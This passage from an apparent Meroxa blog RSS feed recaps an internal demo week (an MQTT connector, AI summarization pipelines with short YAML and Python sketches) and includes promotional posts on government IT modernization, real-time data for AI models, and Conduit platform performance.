&lt;li&gt;&lt;strong&gt;Source File:&lt;/strong&gt; Individual lines of text represent documents, creating a structured input format.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Processors:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Vectorization:&lt;/strong&gt; Generates embeddings for each document using OpenAI’s API.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Context Addition:&lt;/strong&gt; Retrieves related content from Weaviate to enhance summaries with relevant context.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Final Output:&lt;/strong&gt; Summaries are written to a destination file, ready for review or integration into workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Weaviate Integration:&lt;/strong&gt; The vector database stores both the text and its embeddings, enabling efficient contextual retrieval during processing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Summaries:&lt;/strong&gt; Initial summaries were generic, but as more documents were processed and embeddings refined, the results became highly accurate and relevant.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This project exemplifies how Conduit can leverage AI and vector databases to handle real-time document summarization effectively. &lt;a href=&quot;https://youtu.be/AEvDw1NAN08&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
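&lt;p&gt;For a sense of what such a pipeline looks like on disk, here is a sketch in Conduit&apos;s pipeline configuration format. The file source and destination are Conduit built-in connectors; the summarization processor name below is hypothetical and stands in for the processing described above.&lt;/p&gt;

```yaml
version: 2.2
pipelines:
  - id: summarize-docs
    status: running
    connectors:
      - id: docs-in
        type: source
        plugin: builtin:file        # one document per line
        settings:
          path: ./docs.txt
      - id: summaries-out
        type: destination
        plugin: builtin:file
        settings:
          path: ./summaries.txt
    processors:
      - id: summarize
        plugin: example.openai.summarize   # hypothetical processor name
```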
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. MQTT Connector: Real-Time IoT Data Processing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;A major achievement during Champagne Week was the development of an MQTT connector, highlighted in this &lt;a href=&quot;https://www.loom.com/share/a63177d291344cad8bdfc16c9f76cd60&quot;&gt;demo video&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;What is MQTT?&lt;/h3&gt;
&lt;p&gt;MQTT is a lightweight publish/subscribe messaging protocol designed for resource-constrained environments like IoT devices, environmental monitoring systems, and industrial equipment. The MQTT connector allows seamless integration with Conduit pipelines, opening up new use cases in IoT and edge computing.&lt;/p&gt;
&lt;h3&gt;Key Features:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Flexible Topic Subscriptions:&lt;/strong&gt; Users can subscribe to or publish data to MQTT topics, including support for wildcards to capture a range of messages.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pipeline Integration:&lt;/strong&gt; MQTT messages can be routed to various outputs, such as file storage or Elasticsearch, for analysis and visualization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-World Use Case:&lt;/strong&gt; The demo showcased how CPU usage data from Raspberry Pi devices was processed through Conduit, stored in Elasticsearch, and visualized in Kibana dashboards. This demonstrated the connector’s capability to enable real-time monitoring of IoT devices.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This connector showcases how Conduit makes it simple to capture, process, and act on IoT data in real time. &lt;a href=&quot;https://youtu.be/luWWKjd0Ud4&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
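&lt;p&gt;The wildcard support mentioned above follows MQTT&apos;s topic-filter rules: &lt;code&gt;+&lt;/code&gt; matches exactly one topic level, and &lt;code&gt;#&lt;/code&gt; matches all remaining levels. Here is a minimal Python sketch of that matching rule, for illustration only, not the connector&apos;s implementation:&lt;/p&gt;

```python
def topic_matches(filter_str: str, topic: str) -> bool:
    """Minimal MQTT topic-filter matching: '+' matches exactly one
    level, '#' (valid only as the last level) matches the rest."""
    flevels = filter_str.split("/")
    tlevels = topic.split("/")
    for i, f in enumerate(flevels):
        if f == "#":
            return True                  # matches all remaining levels
        if i >= len(tlevels):
            return False                 # topic ran out of levels
        if f != "+" and f != tlevels[i]:
            return False                 # literal level mismatch
    return len(flevels) == len(tlevels)  # no trailing topic levels left

# e.g. subscribe to CPU metrics from every Raspberry Pi:
print(topic_matches("sensors/+/cpu", "sensors/pi-1/cpu"))   # True
print(topic_matches("sensors/#", "sensors/pi-2/cpu/load"))  # True
print(topic_matches("sensors/+/cpu", "sensors/pi-1/mem"))   # False
```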
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. AI Showcase: Vectorizing and Summarizing Pipelines&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Another exciting project during Champagne Week was an AI showcase demonstrating how Conduit supports popular AI use cases. The showcase featured two distinct pipelines—one for vectorizing data and another for summarizing content—both using test data stored in S3.&lt;/p&gt;
&lt;h3&gt;Highlights:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Vectorizing Pipeline:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Converts raw text into embeddings using OpenAI’s API.&lt;/li&gt;
&lt;li&gt;Preserves the original text alongside its embeddings.&lt;/li&gt;
&lt;li&gt;Logs the vectorized output, showcasing how it can be sent to destinations like vector databases.&lt;/li&gt;
&lt;li&gt;Demonstrates simplicity with a concise YAML configuration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Summarizing Pipeline:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Processes text using OpenAI to generate concise summaries.&lt;/li&gt;
&lt;li&gt;Example: Summarized test data about experiments with plants and sound waves, showcasing the pipeline’s ability to generate insightful summaries.&lt;/li&gt;
&lt;li&gt;Uses custom processors to shape data for summarization and output structured logs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Future Enhancements:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Work is ongoing to support additional file types like PDFs.&lt;/li&gt;
&lt;li&gt;Exploring specialized features to enhance ergonomics for AI use cases.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
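&lt;p&gt;For illustration, the vectorizing pipeline described above could be expressed in a Conduit pipeline configuration file along these lines. This is a rough sketch only: the plugin and processor names, bucket, and model below are assumptions for illustration, not the exact configuration used in the demo.&lt;/p&gt;

```yaml
# Hypothetical sketch of a Conduit pipeline configuration.
# Plugin/processor names and settings are illustrative assumptions.
version: "2.2"
pipelines:
  - id: vectorize-s3
    status: running
    connectors:
      - id: source-s3
        type: source
        plugin: "s3"                    # assumed S3 source connector
        settings:
          aws.bucket: "demo-bucket"     # assumed bucket name
      - id: destination-log
        type: destination
        plugin: "builtin:log"           # logs the vectorized output, as in the demo
    processors:
      - id: embed-text
        plugin: "openai.embeddings"     # illustrative processor name
        settings:
          model: "text-embedding-3-small"
```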
&lt;p&gt;This project highlights Conduit’s versatility in enabling real-time AI workflows with minimal configuration. &lt;a href=&quot;https://youtu.be/tsVjc9fDuwA&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;5. Internal Collaboration and Knowledge Sharing: Champagne Week Demo&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Champagne Week isn’t just about shipping features—it’s also about teamwork and sharing successes. During the Champagne Week Demos, team members presented their projects, sharing insights, challenges, and future opportunities.&lt;/p&gt;
&lt;h3&gt;Key Takeaways:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Cross-Team Insights:&lt;/strong&gt; Collaboration across teams was critical to addressing challenges and ensuring impactful solutions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Inspirational Ideas:&lt;/strong&gt; The demo sparked new directions for future innovations, from platform features to user experience improvements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Recognition:&lt;/strong&gt; Acknowledging the creativity and dedication of the team reinforced the value of collaboration and innovation.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;What’s Next?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Champagne Week is a springboard for ongoing improvement and growth. Here’s what’s ahead:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Developer Tools:&lt;/strong&gt; We’ll continue refining tools to enhance the developer experience and reduce friction.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Performance Optimization:&lt;/strong&gt; Ongoing work to ensure Conduit remains reliable and efficient, even at scale.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Community Engagement:&lt;/strong&gt; Expanding opportunities to connect with the Conduit community through new features and events.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;A Toast to Innovation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_174156.png&quot; alt=&quot;dkeeton_174156.png&quot;&gt;
Champagne Week embodies the creativity, dedication, and collaboration of the Meroxa team. Thank you to everyone who contributed to making this week a success—and to our users, who inspire us to keep raising the bar.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates and insights as we build the future of real-time data movement. Cheers!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Government IT Modernization with Meroxa: Accelerate Your Digital Transformation]]></title><description><![CDATA[In this blog, discover how Meroxa empowers governments to overcome the challenges of IT modernization with real-time data integration, cost-effective solutions, and secure, scalable infrastructure. Learn how Meroxa helps transform aging systems into agile, efficient platforms that meet the growing demands of today’s tech-savvy constituents. Explore real-world success stories, actionable insights, and innovative strategies to deliver better services, reduce costs, and improve transparency—without sacrificing security or control. Whether you're managing federal programs, state services, or local initiatives, Meroxa enables you to reimagine government operations at the speed of innovation.  ]]></description><link>https://meroxa.com/blog/government-it-modernization-with-meroxa-accelerate-your-digital-transformation</link><guid isPermaLink="false">https://meroxa.com/blog/government-it-modernization-with-meroxa-accelerate-your-digital-transformation</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Thu, 05 Dec 2024 11:38:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Empower Your Government to Work Smarter and Faster&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Constituents today expect government services to be as seamless and user-friendly as the digital experiences they enjoy in the private sector. But with legacy systems, siloed data, and increasing demands, many agencies face challenges in meeting those expectations.&lt;/p&gt;
&lt;p&gt;At Meroxa, we bridge the gap between traditional government systems and modern digital agility. With our &lt;strong&gt;real-time data integration and movement platform&lt;/strong&gt;, we enable governments to modernize IT infrastructure without sacrificing security, transparency, or cost-efficiency. Whether you’re transforming local services, scaling state-level programs, or overhauling federal systems, Meroxa equips you to work at the speed of innovation.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Our Government IT Solutions&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data, Real-Time Results&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Enable real-time insights and decision-making by &lt;strong&gt;reducing data latency by up to 60%&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Deliver on-demand services with &lt;strong&gt;seamless data synchronization&lt;/strong&gt; across departments and platforms.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Modernization Without Overhauls&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Extend the value of legacy systems with &lt;strong&gt;modern integrations&lt;/strong&gt; that don’t require costly replacements.&lt;/li&gt;
&lt;li&gt;Simplify IT transformations with our &lt;strong&gt;low-code platform&lt;/strong&gt;, reducing operational complexity.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability and Efficiency&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Dynamically scale your infrastructure to handle high-volume workloads like benefits processing, public safety initiatives, and more.&lt;/li&gt;
&lt;li&gt;Save up to &lt;strong&gt;30% in operational costs&lt;/strong&gt; by automating manual workflows and optimizing resource use.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Security and Transparency&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Protect sensitive constituent data with &lt;strong&gt;end-to-end encryption&lt;/strong&gt; and robust access controls.&lt;/li&gt;
&lt;li&gt;Maintain compliance with strict audit trails and data lineage features that provide visibility into every transaction.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Challenges of Government IT Modernization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_IT_Modernization.png&quot; alt=&quot;dkeeton_17415_IT_Modernization.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Transforming government IT isn’t just about technology—it’s about navigating complex challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Legacy Systems:&lt;/strong&gt; Many agencies still rely on outdated systems that weren’t designed to support modern demands.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Siloed Data:&lt;/strong&gt; Departments often operate in isolation, leading to inefficiencies and fragmented constituent experiences.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Budget Constraints:&lt;/strong&gt; Governments need solutions that balance cost, performance, and scalability.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Meroxa helps governments overcome these hurdles by enabling &lt;strong&gt;real-time data movement&lt;/strong&gt;, modern integrations, and flexible infrastructure upgrades—all without the need for costly, full-scale replacements.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;How Meroxa Powers Government IT Transformation&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. Real-Time Data Integration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Governments generate and rely on massive amounts of data—but disconnected systems create bottlenecks. Meroxa unifies data flows, enabling real-time communication between legacy systems, new applications, and external platforms.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Seamlessly integrate databases, CRMs, and analytics tools across departments.&lt;/li&gt;
&lt;li&gt;Power faster decision-making with real-time insights into mission-critical operations.&lt;/li&gt;
&lt;li&gt;Ensure scalability with &lt;strong&gt;dynamic pipeline management&lt;/strong&gt; that adjusts to peak workloads.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; A state health department reduced benefits processing times by &lt;strong&gt;50%&lt;/strong&gt; by unifying data across welfare, healthcare, and child services systems.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Cost-Effective Modernization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Replacing aging systems outright isn’t always feasible. With Meroxa, governments can extend the functionality of legacy systems while embracing cutting-edge solutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Low-code platform:&lt;/strong&gt; Simplify complex integrations with intuitive, developer-friendly tools.&lt;/li&gt;
&lt;li&gt;Automate data workflows to eliminate manual errors and inefficiencies.&lt;/li&gt;
&lt;li&gt;Enable faster rollouts of digital services while staying within budget.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; A national child support system managing over $360 million annually saved &lt;strong&gt;20% in operational costs&lt;/strong&gt; by integrating existing databases with Meroxa’s platform.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Better Constituent Services&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Modern constituents expect fast, personalized, and secure access to government services. Meroxa helps agencies deliver:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Real-time personalization for services like benefits processing, permit applications, and public inquiries.&lt;/li&gt;
&lt;li&gt;Streamlined interagency collaboration to reduce delays and improve outcomes.&lt;/li&gt;
&lt;li&gt;AI-powered insights to predict and address constituent needs proactively.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; In Israel, welfare application processing times were reduced from months to hours using Meroxa’s real-time data platform.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Transparent and Secure Operations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Governments handle sensitive data daily, making security and transparency paramount. Meroxa ensures:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;End-to-end encryption:&lt;/strong&gt; Protect data at every step of the pipeline.&lt;/li&gt;
&lt;li&gt;Detailed audit logs and data lineage tracking for compliance and governance.&lt;/li&gt;
&lt;li&gt;Secure integration with monitoring tools like Splunk and OpenTelemetry.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; A federal agency managing public safety programs maintained &lt;strong&gt;100% compliance&lt;/strong&gt; with strict data governance regulations by leveraging Meroxa’s security features.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_dept_of_defense_it.png&quot; alt=&quot;dkeeton_17415_dept_of_defense_it.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Reimagine Government IT with Meroxa&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Modernizing IT infrastructure is no longer optional—it’s essential to meet the needs of today’s constituents. With Meroxa, governments can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deliver faster, more efficient services at scale.&lt;/li&gt;
&lt;li&gt;Achieve digital transformation without abandoning legacy investments.&lt;/li&gt;
&lt;li&gt;Securely manage and share data across systems, agencies, and platforms.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;How Can Meroxa Help You?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;In the U.S.:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Transform federal, state, and local government services with real-time data integration.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Globally:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;From smart cities to social services, Meroxa empowers governments around the world to reimagine how they serve their citizens.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Contact Us:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Ready to modernize your IT infrastructure? Speak to a Meroxa expert today and take the first step toward a more agile, efficient government.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Let’s Connect →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Stale Data is Killing Your AI Models: Why Real Time Data is the Best Path Forward]]></title><description><![CDATA[In today’s fast-paced AI landscape, relying on outdated, static datasets can lead to inaccurate models, costly retraining cycles, and delayed time-to-market for AI features. Real-time data pipelines offer a game-changing solution, enabling AI systems to stay accurate, scalable, and cost-effective by continuously learning from current conditions. With benefits like a 40% reduction in model hallucinations, faster deployment, and lower infrastructure costs, real-time data is essential for building reliable applications such as fraud detection, recommendation engines, and Customer 360 profiles. Discover how Meroxa’s platform empowers organizations to implement real-time data pipelines and unlock the full potential of their AI initiatives. ]]></description><link>https://meroxa.com/blog/stale-data-is-killing-your-ai-models-why-real-time-data-is-the-best-path-forward</link><guid isPermaLink="false">https://meroxa.com/blog/stale-data-is-killing-your-ai-models-why-real-time-data-is-the-best-path-forward</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Mon, 25 Nov 2024 17:42:48 GMT</pubDate><content:encoded>&lt;p&gt;As we navigate the explosive growth of AI adoption across industries, one challenge remains persistently thorny: ensuring our AI models remain accurate, reliable, and cost-effective to maintain. At Meroxa, we&apos;ve observed a clear pattern emerge – organizations that leverage real-time data for their AI models consistently outperform those relying on static, historical datasets.&lt;/p&gt;
&lt;h2&gt;The Hidden Cost of Stale Data&lt;/h2&gt;
&lt;p&gt;Most organizations today train their AI models on historical data dumps, typically refreshed weekly or monthly. While this approach might have sufficed in the past, it&apos;s becoming increasingly inadequate in our fast-paced digital environment. Here&apos;s what we&apos;re seeing in the field:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Models trained on outdated data are more prone to hallucinations, especially in dynamic domains like finance, e-commerce, and social media&lt;/li&gt;
&lt;li&gt;Companies spend millions retraining models that have drifted from reality&lt;/li&gt;
&lt;li&gt;Time-to-market for AI features is hampered by lengthy data preparation and training cycles&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Real-Time Data: The Antidote to AI Hallucinations&lt;/h2&gt;
&lt;p&gt;When AI models have access to real-time data streams, they maintain a closer connection to reality. At Meroxa, we&apos;ve helped numerous organizations implement real-time data pipelines for their AI systems, and the results are compelling:&lt;/p&gt;
&lt;p&gt;Our financial services clients report a 40% reduction in model hallucinations after implementing real-time data feeds. The reason is simple – when models can continuously learn from current market conditions, customer behaviors, and emerging patterns, they&apos;re less likely to generate responses based on outdated assumptions.&lt;/p&gt;
&lt;h2&gt;The Economic Argument for Real-Time Data&lt;/h2&gt;
&lt;p&gt;The financial benefits of real-time data integration extend beyond improved accuracy. We&apos;re seeing organizations achieve:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Reduced Training Costs: Instead of massive, periodic retraining sessions, models can be fine-tuned incrementally with fresh data, requiring significantly less computational resources.&lt;/li&gt;
&lt;li&gt;Faster Time-to-Market: Real-time data pipelines eliminate the need for time-consuming ETL processes and data preparation, allowing teams to deploy and iterate on models more rapidly.&lt;/li&gt;
&lt;li&gt;Lower Infrastructure Costs: By processing data incrementally rather than in large batches, organizations can maintain smaller, more efficient infrastructure footprints.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;From Theory to Practice: Implementing Real-Time Data Pipelines&lt;/h2&gt;
&lt;p&gt;The benefits of real-time data are clear, but implementation has traditionally been a significant hurdle. This is where modern data infrastructure platforms come into play. At Meroxa, we&apos;ve built our platform specifically to address these challenges, offering:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Seamless integration with existing data sources that support the vector datatype&lt;/li&gt;
&lt;li&gt;Built-in stream processing to automate data preparation&lt;/li&gt;
&lt;li&gt;Automatic scaling to handle varying data volumes&lt;/li&gt;
&lt;li&gt;Enterprise-grade security and compliance features&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Future is Real-Time&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_real_time_data_v_6.1_955717ea-d3c0-4be8-bc11-14aecd448a56_3.png&quot; alt=&quot;dkeeton_17415_real_time_data_v_6.1_955717ea-d3c0-4be8-bc11-14aecd448a56_3.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;As AI continues to evolve and become more deeply embedded in business operations, the importance of real-time data will only grow. Organizations that invest in robust real-time data infrastructure today will be better positioned to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deploy more accurate and reliable AI models&lt;/li&gt;
&lt;li&gt;Respond faster to changing market conditions&lt;/li&gt;
&lt;li&gt;Reduce their overall AI infrastructure costs&lt;/li&gt;
&lt;li&gt;Stay ahead of competitors in AI-driven innovation&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Getting Started&lt;/h2&gt;
&lt;p&gt;The shift to real-time data doesn&apos;t have to be overwhelming. Start by identifying one critical AI model in your organization that would benefit from fresher data. Consider the current refresh rate, the cost of retraining, and the impact of model drift on your business outcomes.&lt;/p&gt;
&lt;p&gt;At Meroxa, we&apos;ve helped organizations across industries make this transition successfully. Whether you&apos;re just starting your AI journey or looking to optimize existing models, we have the expertise and technology to help you implement real-time data pipelines that drive better AI outcomes. Remember, in the world of AI, your models are only as good as the data they learn from. Make sure that data is as fresh and relevant as possible.&lt;/p&gt;
&lt;p&gt;Want to learn more about implementing real-time data pipelines for your AI infrastructure? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up today!&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Meroxa’s Conduit Platform: Real-Time Data Movement at Scale, with Proven Performance]]></title><description><![CDATA[Our latest article highlights why Meroxa’s Conduit Platform is the game-changing solution for real-time data streaming, offering up to 90% faster data delivery and 80% lower latency compared to batch-based tools like Fivetran.]]></description><link>https://meroxa.com/blog/meroxas-conduit-platform-real-time-data-movement-at-scale-with-proven-performance</link><guid isPermaLink="false">https://meroxa.com/blog/meroxas-conduit-platform-real-time-data-movement-at-scale-with-proven-performance</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 20 Nov 2024 05:42:26 GMT</pubDate><content:encoded>&lt;p&gt;In the age of big data, real-time movement isn&apos;t just a luxury—it&apos;s a necessity. Tools like Fivetran, while useful for batch processing, can’t deliver the performance required for real-time operations at scale. Meroxa’s Conduit Platform stands apart, providing &lt;strong&gt;real-time data streaming&lt;/strong&gt; with unmatched scalability, all while empowering businesses to own and manage their data lakes and warehouses.&lt;/p&gt;
&lt;p&gt;But how does Meroxa’s performance stack up? Let’s explore the numbers.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Real-Time vs. Batch: The Meroxa Advantage&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time processing isn’t just faster—it’s transformative. Meroxa’s Conduit Platform is optimized to deliver &lt;strong&gt;up to 90% faster data delivery&lt;/strong&gt; compared to batch-based systems like Fivetran. This means businesses can act on insights almost instantaneously rather than waiting minutes or hours for batch updates.&lt;/p&gt;
&lt;h3&gt;Performance Highlights:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;99.9% data delivery reliability&lt;/strong&gt; across real-time pipelines, even during peak loads.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;80% reduction in data latency&lt;/strong&gt;, enabling near-instantaneous responses to critical events.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;4x throughput capacity&lt;/strong&gt; compared to traditional ETL tools, supporting millions of events per second.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Bring Your Own Data Lake or Warehouse (BYO)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_create_an_illustration_data_warehouse_integrate_b957fc85-fc0c-4825-943b-d16d5b77ff69_1.png&quot; alt=&quot;dkeeton_17415_create_an_illustration_data_warehouse_integrate_b957fc85-fc0c-4825-943b-d16d5b77ff69_1.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Unlike Fivetran’s managed approach, which often locks businesses into proprietary systems, Meroxa’s Conduit Platform embraces flexibility. With Meroxa, you can leverage your existing data lake or warehouse infrastructure—whether that’s AWS S3, Snowflake, BigQuery, or others—while enjoying the performance benefits of real-time streaming.&lt;/p&gt;
&lt;h3&gt;Benefits of the BYO Approach:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Cost Savings&lt;/strong&gt;: Businesses report &lt;strong&gt;up to 60% lower infrastructure costs&lt;/strong&gt; by eliminating the need for redundant storage and managed services.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Full Control&lt;/strong&gt;: Maintain ownership of your data, ensuring compliance, security, and flexibility.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless Integration&lt;/strong&gt;: Build pipelines tailored to your unique architecture, avoiding the limitations of one-size-fits-all solutions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Performance&lt;/strong&gt;: Stream data directly to your data lake or warehouse, ensuring it’s ready for analysis with &lt;strong&gt;50% faster ingestion times&lt;/strong&gt; compared to batch systems.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Scalability and Flexibility: Built for Enterprise Loads&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform is built to handle the most demanding use cases. With &lt;strong&gt;elastic scaling&lt;/strong&gt;, the platform easily supports high-throughput environments without sacrificing performance.&lt;/p&gt;
&lt;h3&gt;Key Metrics:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Handles up to 10 million events per second&lt;/strong&gt;, ensuring seamless scalability for even the largest organizations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;50% faster pipeline deployment&lt;/strong&gt;, reducing time-to-market for data integration projects.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Zero downtime&lt;/strong&gt; during scaling events, guaranteeing uninterrupted operations.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Real-World Use Cases with Proven Results&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Real-Time Fraud Detection&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A fintech company leveraged Meroxa to stream transactional data in real time to its data lake for fraud detection. The result? &lt;strong&gt;90% faster anomaly detection&lt;/strong&gt;, reducing fraud losses by millions annually.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dynamic Inventory Management&lt;/strong&gt;&lt;/p&gt;
